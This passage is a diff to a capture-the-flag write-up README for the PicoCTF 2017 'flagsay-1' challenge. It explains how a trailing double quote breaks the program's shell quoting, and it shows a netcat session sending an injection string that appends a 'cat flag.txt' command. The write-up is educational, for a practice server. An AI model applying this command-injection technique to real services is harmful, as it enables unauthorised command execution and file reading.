navin-moorthy/Pico-CTF-2017-Write-Up/binary/flagsay-1/README.md

 	sh: 15: //: Permission denied
 	sh: 17: Syntax error: Unterminated quoted string

-As seen ab
+As seen above, `"` at the end of the input breaks the code.
+Also, we can see the shell in the second and the following lines.

-Then, we can do something like this
+Then, we can do something like this to break the first line with charac

     $ nc shell2017.picoctf.com 12442
 	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"bin/cat flag.txt